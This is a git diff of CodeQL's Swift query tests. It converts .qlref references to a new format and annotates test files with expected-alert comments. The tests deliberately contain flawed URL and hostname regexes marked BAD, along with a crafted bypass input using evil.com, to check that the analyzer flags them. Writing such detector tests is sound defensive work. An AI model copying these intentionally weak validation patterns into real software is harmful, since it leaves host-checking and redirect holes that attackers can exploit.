+- .../query-tests/Security/CWE-916/test.swift | 10 +- 81 files changed, 1314 insertions(+), 1295 deletions(-) diff --git a/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.qlref b/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.qlref index f7d7d0c4fcbd..d4d4213d1ede 100644 --- a/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.qlref +++ b/swift/ql/test/extractor-tests/generated/decl/CapturedDecl/PrintAst.qlref @@ -1 +1 @@ -library-tests/ast/PrintAst.ql +query: library-tests/ast/PrintAst.ql diff --git a/swift/ql/test/extractor-tests/updates/PrintAst.qlref b/swift/ql/test/extractor-tests/updates/PrintAst.qlref index f7d7d0c4fcbd..d4d4213d1ede 100644 --- a/swift/ql/test/extractor-tests/updates/PrintAst.qlref +++ b/swift/ql/test/extractor-tests/updates/PrintAst.qlref @@ -1 +1 @@ -library-tests/ast/PrintAst.ql +query: library-tests/ast/PrintAst.ql diff --git a/swift/ql/test/library-tests/ast/Errors.qlref b/swift/ql/test/library-tests/ast/Errors.qlref index 7441b24678d8..a1c638c8fca6 100644 --- a/swift/ql/test/library-tests/ast/Errors.qlref +++ b/swift/ql/test/library-tests/ast/Errors.qlref @@ -1 +1 @@ -extractor-tests/errors/Errors.ql +query: extractor-tests/errors/Errors.ql diff --git a/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.qlref b/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.qlref index f7d7d0c4fcbd..d4d4213d1ede 100644 --- a/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.qlref +++ b/swift/ql/test/library-tests/elements/expr/methodlookup/PrintAst.qlref @@ -1 +1 @@ -library-tests/ast/PrintAst.ql +query: library-tests/ast/PrintAst.ql diff --git a/swift/ql/test/library-tests/hidden-ast/PrintAst.qlref b/swift/ql/test/library-tests/hidden-ast/PrintAst.qlref index f7d7d0c4fcbd..d4d4213d1ede 100644 --- a/swift/ql/test/library-tests/hidden-ast/PrintAst.qlref +++ b/swift/ql/test/library-tests/hidden-ast/PrintAst.qlref @@ -1 +1 @@ -library-tests/ast/PrintAst.ql +query: library-tests/ast/PrintAst.ql diff --git a/swift/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref b/swift/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref index 9d7833eccae7..dc898fca718c 100644 --- a/swift/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref +++ b/swift/ql/test/query-tests/AlertSuppression/AlertSuppression.qlref @@ -1 +1 @@ -AlertSuppression.ql +query: AlertSuppression.ql diff --git a/swift/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref b/swift/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref index f0e7bd917f84..3c5f5df7c8b1 100644 --- a/swift/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref +++ b/swift/ql/test/query-tests/Diagnostics/ExtractedFiles.qlref @@ -1 +1 @@ -diagnostics/ExtractedFiles.ql +query: diagnostics/ExtractedFiles.ql diff --git a/swift/ql/test/query-tests/Diagnostics/SuccessfullyExtractedLines.qlref b/swift/ql/test/query-tests/Diagnostics/SuccessfullyExtractedLines.qlref index 26996e64988e..3742e604b165 100644 --- a/swift/ql/test/query-tests/Diagnostics/SuccessfullyExtractedLines.qlref +++ b/swift/ql/test/query-tests/Diagnostics/SuccessfullyExtractedLines.qlref @@ -1 +1 @@ -diagnostics/SuccessfullyExtractedLines.ql +query: diagnostics/SuccessfullyExtractedLines.ql diff --git a/swift/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegex.qlref b/swift/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegex.qlref index b80ac364258b..6b46d67a8493 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegex.qlref +++ b/swift/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegex.qlref @@ -1 +1,2 @@ -queries/Security/CWE-020/IncompleteHostnameRegex.ql +query: queries/Security/CWE-020/IncompleteHostnameRegex.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.qlref b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.qlref index 9b1f04d1a7a2..4e76e1995e9c 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.qlref +++ b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.qlref @@ -1 +1,2 @@ -queries/Security/CWE-020/MissingRegexAnchor.ql +query: queries/Security/CWE-020/MissingRegexAnchor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-020/SemiAnchoredRegex.swift b/swift/ql/test/query-tests/Security/CWE-020/SemiAnchoredRegex.swift index 3b0abe53048d..5f2b0924c8c0 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/SemiAnchoredRegex.swift +++ b/swift/ql/test/query-tests/Security/CWE-020/SemiAnchoredRegex.swift @@ -47,63 +47,63 @@ class NSString : NSObject { func tests(input: String) throws { _ = try Regex("^a|").firstMatch(in: input) - _ = try Regex("^a|b").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("^a|b").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("a|^b").firstMatch(in: input) _ = try Regex("^a|^b").firstMatch(in: input) - _ = try Regex("^a|b|c").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("^a|b|c").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("a|^b|c").firstMatch(in: input) _ = try Regex("a|b|^c").firstMatch(in: input) _ = try Regex("^a|^b|c").firstMatch(in: input) _ = try Regex("(^a)|b").firstMatch(in: input) - _ = try Regex("^a|(b)").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("^a|(b)").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("^a|(^b)").firstMatch(in: input) - _ = try Regex("^(a)|(b)").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("^(a)|(b)").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] - _ = try Regex("a|b$").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("a|b$").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("a$|b").firstMatch(in: input) _ = try Regex("a$|b$").firstMatch(in: input) - _ = try Regex("a|b|c$").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("a|b|c$").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("a|b$|c").firstMatch(in: input) _ = try Regex("a$|b|c").firstMatch(in: input) _ = try Regex("a|b$|c$").firstMatch(in: input) _ = try Regex("a|(b$)").firstMatch(in: input) - _ = try Regex("(a)|b$").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("(a)|b$").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("(a$)|b$").firstMatch(in: input) - _ = try Regex("(a)|(b)$").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("(a)|(b)$").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] - _ = try Regex(#"^good.com|better.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^good\.com|better\.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^good\\.com|better\\.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^good\\\.com|better\\\.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^good\\\\.com|better\\\\.com"#).firstMatch(in: input) // BAD (missing anchor) + _ = try Regex(#"^good.com|better.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^good\.com|better\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^good\\.com|better\\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^good\\\.com|better\\\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^good\\\\.com|better\\\\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] - _ = try Regex("^foo|bar|baz$").firstMatch(in: input) // BAD (missing anchor) + _ = try Regex("^foo|bar|baz$").firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex("^foo|%").firstMatch(in: input) } func realWorld(input: String) throws { // real-world examples that have been anonymized a bit // the following are bad: - _ = try Regex(#"(\.xxx)|(\.yyy)|(\.zzz)$"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"(^left|right|center)\sbottom$"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"\.xxx|\.yyy|\.zzz$"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"\.xxx|\.yyy|\.zzz$"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"\.xxx|\.yyy|zzz$"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^([A-Z]|xxx[XY]$)"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^(xxx yyy zzz)|(xxx yyy)"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^(xxx:)|(yyy:)|(zzz:)"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^(xxx?:)|(yyy:zzz\/)"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^@media|@page"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^\s*(xxx?|yyy|zzz):|xxx:yyy"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^click|mouse|touch"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^http://good\.com|http://better\.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^https?://good\.com|https?://better\.com"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^mouse|touch|click|contextmenu|drop|dragover|dragend"#).firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"^xxx:|yyy:"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) - _ = try Regex(#"_xxx|_yyy|_zzz$"#).firstMatch(in: input) // BAD (missing anchor) + _ = try Regex(#"(\.xxx)|(\.yyy)|(\.zzz)$"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"(^left|right|center)\sbottom$"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"\.xxx|\.yyy|\.zzz$"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"\.xxx|\.yyy|\.zzz$"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"\.xxx|\.yyy|zzz$"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^([A-Z]|xxx[XY]$)"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^(xxx yyy zzz)|(xxx yyy)"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^(xxx:)|(yyy:)|(zzz:)"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^(xxx?:)|(yyy:zzz\/)"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^@media|@page"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^\s*(xxx?|yyy|zzz):|xxx:yyy"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^click|mouse|touch"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^http://good\.com|http://better\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^https?://good\.com|https?://better\.com"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^mouse|touch|click|contextmenu|drop|dragover|dragend"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^xxx:|yyy:"#).ignoresCase().firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"_xxx|_yyy|_zzz$"#).firstMatch(in: input) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex(#"em|%$"#).firstMatch(in: input) // BAD (missing anchor) [NOT DETECTED] - not flagged at the moment due to the anchor not being for letters // the following are MAYBE OK due to apparent complexity; not flagged diff --git a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift index b2e8810e7b75..bb25bd54c14f 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift +++ b/swift/ql/test/query-tests/Security/CWE-020/UnanchoredUrlRegex.swift @@ -59,36 +59,36 @@ func tests(url: String, secure: Bool) throws { let input = "http://evil.com/?http://good.com" let inputRange = NSMakeRange(0, input.utf16.count) - _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) - _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) - _ = try NSRegularExpression(pattern: "^https?://good.com").matches(in: input, range: inputRange) // BAD (missing post-anchor) - _ = try NSRegularExpression(pattern: "(^https?://good1.com)|(^https?://good2.com)").matches(in: input, range: inputRange) // BAD (missing post-anchor) - _ = try NSRegularExpression(pattern: "(https?://good.com)|(^https?://goodie.com)").matches(in: input, range: inputRange) // BAD (missing anchor) + _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: "^https?://good.com").matches(in: input, range: inputRange) // BAD (missing post-anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: "(^https?://good1.com)|(^https?://good2.com)").matches(in: input, range: inputRange) // BAD (missing post-anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: "(https?://good.com)|(^https?://goodie.com)").matches(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] - _ = try NSRegularExpression(pattern: #"https?:\/\/good.com"#).matches(in: input, range: inputRange) // BAD (missing anchor) - _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) + _ = try NSRegularExpression(pattern: #"https?:\/\/good.com"#).matches(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: "https?://good.com").matches(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] - if let _ = try NSRegularExpression(pattern: "https?://good.com").firstMatch(in: input, range: inputRange) { } // BAD (missing anchor) + if let _ = try NSRegularExpression(pattern: "https?://good.com").firstMatch(in: input, range: inputRange) { } // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] let input2 = "something" let input2Range = NSMakeRange(0, input2.utf16.count) _ = try NSRegularExpression(pattern: "other").firstMatch(in: input2, range: input2Range) // OK _ = try NSRegularExpression(pattern: "x.commissary").firstMatch(in: input2, range: input2Range) // OK - _ = try NSRegularExpression(pattern: #"https?://good.com"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) - _ = try NSRegularExpression(pattern: #"https?://good.com:8080"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) + _ = try NSRegularExpression(pattern: #"https?://good.com"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try NSRegularExpression(pattern: #"https?://good.com:8080"#).firstMatch(in: input, range: inputRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] let trustedUrlRegexs = [ - "https?://good.com", // BAD (missing anchor), referenced below - #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below - "^https?://good.com" // BAD (missing post-anchor), referenced below + "https?://good.com", // BAD (missing anchor), referenced below // $ Alert[swift/missing-regexp-anchor] + #"https?:\/\/good.com"#, // BAD (missing anchor), referenced below // $ Alert[swift/missing-regexp-anchor] + "^https?://good.com" // BAD (missing post-anchor), referenced below // $ Alert[swift/missing-regexp-anchor] ] for trustedUrlRegex in trustedUrlRegexs { if let _ = try NSRegularExpression(pattern: trustedUrlRegex).firstMatch(in: input, range: inputRange) { } } let trustedUrlRegexs2 = [ - "https?://good.com", // BAD (missing anchor), referenced below + "https?://good.com", // BAD (missing anchor), referenced below // $ Alert[swift/missing-regexp-anchor] ] if let _ = try NSRegularExpression(pattern: trustedUrlRegexs2[0]).firstMatch(in: input, range: inputRange) { } @@ -98,13 +98,13 @@ func tests(url: String, secure: Bool) throws { for _ in notUsedUrlRegexs { } - _ = try NSRegularExpression(pattern: #"https?:\/\/good.com\/([0-9]+)"#).matches(in: url, range: urlRange) // BAD (missing anchor) + _ = try NSRegularExpression(pattern: #"https?:\/\/good.com\/([0-9]+)"#).matches(in: url, range: urlRange) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try NSRegularExpression(pattern: "https://verygood.com/?id=" + #"https?:\/\/good.com\/([0-9]+)"#).matches(in: url, range: urlRange)[0] // OK _ = try NSRegularExpression(pattern: "http" + (secure ? "s" : "") + "://" + "verygood.com/?id=" + #"https?:\/\/good.com\/([0-9]+)"#).matches(in: url, range: urlRange)[0] // OK _ = try NSRegularExpression(pattern: "verygood.com/?id=" + #"https?:\/\/good.com\/([0-9]+)"#).matches(in: url, range: urlRange)[0] // OK _ = try NSRegularExpression(pattern: #"\.com|\.org"#).matches(in: input, range: inputRange) // OK, has no domain name - _ = try NSRegularExpression(pattern: #"example\.com|whatever"#).matches(in: input, range: inputRange) // OK, the other disjunction doesn't match a hostname [FALSE POSITIVE] + _ = try NSRegularExpression(pattern: #"example\.com|whatever"#).matches(in: input, range: inputRange) // OK, the other disjunction doesn't match a hostname [FALSE POSITIVE] // $ Alert[swift/missing-regexp-anchor] // tests for the `isLineAnchoredHostnameRegExp` case diff --git a/swift/ql/test/query-tests/Security/CWE-020/test.swift b/swift/ql/test/query-tests/Security/CWE-020/test.swift index e19af9050fd3..c5592ad335e0 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-020/test.swift @@ -53,49 +53,49 @@ func testHostnames(myUrl: URL) throws { _ = try Regex(#"^http://example\.com/"#).firstMatch(in: tainted) // GOOD _ = try Regex(#"^http://example.com/"#).firstMatch(in: tainted) // GOOD (only '.' here gives a valid top-level domain) - _ = try Regex(#"^http://example.com"#).firstMatch(in: tainted) // BAD (missing anchor) + _ = try Regex(#"^http://example.com"#).firstMatch(in: tainted) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] _ = try Regex(#"^http://test\.example\.com/"#).firstMatch(in: tainted) // GOOD _ = try Regex(#"^http://test\.example.com/"#).firstMatch(in: tainted) // GOOD (only '.' here gives a valid top-level domain) - _ = try Regex(#"^http://test\.example.com"#).firstMatch(in: tainted) // BAD (missing anchor) - _ = try Regex(#"^http://test.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) + _ = try Regex(#"^http://test\.example.com"#).firstMatch(in: tainted) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^http://test.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] _ = try Regex(#"^http://test[.]example[.]com/"#).firstMatch(in: tainted) // GOOD (alternative method of escaping) - _ = try Regex(#"^http://test.example.net/"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^http://test.(example-a|example-b).com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^http://(.+).example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname x 2) + _ = try Regex(#"^http://test.example.net/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^http://test.(example-a|example-b).com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^http://(.+).example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname x 2) // $ Alert[swift/incomplete-hostname-regexp] _ = try Regex(#"^http://(\.+)\.example.com/"#).firstMatch(in: tainted) // GOOD - _ = try Regex(#"^http://(?:.+)\.test\.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^http://test.example.com/(?:.*)"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^(.+\.(?:example-a|example-b)\.com)/"#).firstMatch(in: tainted) // BAD (missing anchor) - _ = try Regex(#"^(https?:)?//((service|www).)?example.com(?=$|/)"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^(http|https)://www.example.com/p/f/"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^(http://sub.example.com/)"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^https?://api.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) + _ = try Regex(#"^http://(?:.+)\.test\.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^http://test.example.com/(?:.*)"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^(.+\.(?:example-a|example-b)\.com)/"#).firstMatch(in: tainted) // BAD (missing anchor) // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^(https?:)?//((service|www).)?example.com(?=$|/)"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^(http|https)://www.example.com/p/f/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^(http://sub.example.com/)"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^https?://api.example.com/"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] _ = try Regex(#"^http[s]?://?sub1\.sub2\.example\.com/f/(.+)"#).firstMatch(in: tainted) // GOOD (it has a capture group after the TLD, so should be ignored) - _ = try Regex(#"^https://[a-z]*.example.com$"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"^(example.dev|example.com)"#).firstMatch(in: tainted) // GOOD (any extended hostname wouldn't be included in the capture group) [FALSE POSITIVE] - _ = try Regex(#"^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)"#).firstMatch(in: tainted) // BAD (incomplete hostname x3, missing anchor x 1) + _ = try Regex(#"^https://[a-z]*.example.com$"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"^(example.dev|example.com)"#).firstMatch(in: tainted) // GOOD (any extended hostname wouldn't be included in the capture group) [FALSE POSITIVE] // $ Alert[swift/missing-regexp-anchor] + _ = try Regex(#"^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)"#).firstMatch(in: tainted) // BAD (incomplete hostname x3, missing anchor x 1) // $ Alert[swift/incomplete-hostname-regexp] Alert[swift/missing-regexp-anchor] _ = try Regex(#"^http://(..|...)\.example\.com/index\.html"#).firstMatch(in: tainted) // GOOD (wildcards are intentional) _ = try Regex(#"^http://.\.example\.com/index\.html"#).firstMatch(in: tainted) // GOOD (the wildcard is intentional) - _ = try Regex(#"^(foo.example\.com|whatever)$"#).firstMatch(in: tainted) // DUBIOUS (one disjunction doesn't even look like a hostname) [DETECTED incomplete hostname, missing anchor] + _ = try Regex(#"^(foo.example\.com|whatever)$"#).firstMatch(in: tainted) // DUBIOUS (one disjunction doesn't even look like a hostname) [DETECTED incomplete hostname, missing anchor] // $ Alert[swift/incomplete-hostname-regexp] Alert[swift/missing-regexp-anchor] - _ = try Regex(#"^test.example.com$"#).firstMatch(in: tainted) // BAD (incomplete hostname) - _ = try Regex(#"test.example.com"#).wholeMatch(in: tainted) // BAD (incomplete hostname, missing anchor) + _ = try Regex(#"^test.example.com$"#).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] + _ = try Regex(#"test.example.com"#).wholeMatch(in: tainted) // BAD (incomplete hostname, missing anchor) // $ Alert[swift/incomplete-hostname-regexp] Alert[swift/missing-regexp-anchor] - _ = try Regex(id(id(id(#"test.example.com$"#)))).firstMatch(in: tainted) // BAD (incomplete hostname) + _ = try Regex(id(id(id(#"test.example.com$"#)))).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] let hostname = #"test.example.com$"# // BAD (incomplete hostname) [NOT DETECTED] _ = try Regex("\(hostname)").firstMatch(in: tainted) var domain = MyDomain("") - domain.hostname = #"test.example.com$"# // BAD (incomplete hostname) + domain.hostname = #"test.example.com$"# // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] _ = try Regex(domain.hostname).firstMatch(in: tainted) func convert1(_ domain: MyDomain) throws -> Regex { return try Regex(domain.hostname) } - _ = try convert1(MyDomain(#"test.example.com$"#)).firstMatch(in: tainted) // BAD (incomplete hostname) + _ = try convert1(MyDomain(#"test.example.com$"#)).firstMatch(in: tainted) // BAD (incomplete hostname) // $ Alert[swift/incomplete-hostname-regexp] let domains = [ MyDomain(#"test.example.com$"#) ] // BAD (incomplete hostname) [NOT DETECTED] func convert2(_ domain: MyDomain) throws -> Regex { diff --git a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected index 013959ee4505..47477a9aa60f 100644 --- a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected +++ b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected @@ -1,3 +1,6 @@ +#select +| UnsafeUnpack.swift:64:27:64:27 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:64:27:64:27 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | +| UnsafeUnpack.swift:67:39:67:39 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:67:39:67:39 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | edges | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:62:60:62:60 | source | provenance | Config | | UnsafeUnpack.swift:62:60:62:60 | source | UnsafeUnpack.swift:64:27:64:27 | source | provenance | | @@ -8,6 +11,3 @@ nodes | UnsafeUnpack.swift:64:27:64:27 | source | semmle.label | source | | UnsafeUnpack.swift:67:39:67:39 | source | semmle.label | source | subpaths -#select -| UnsafeUnpack.swift:64:27:64:27 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:64:27:64:27 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | -| UnsafeUnpack.swift:67:39:67:39 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:67:39:67:39 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | diff --git a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.qlref b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.qlref index 1d1a5a3a84ce..f637622e3a15 100644 --- a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.qlref +++ b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-022/UnsafeUnpack.ql \ No newline at end of file +query: experimental/Security/CWE-022/UnsafeUnpack.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.swift 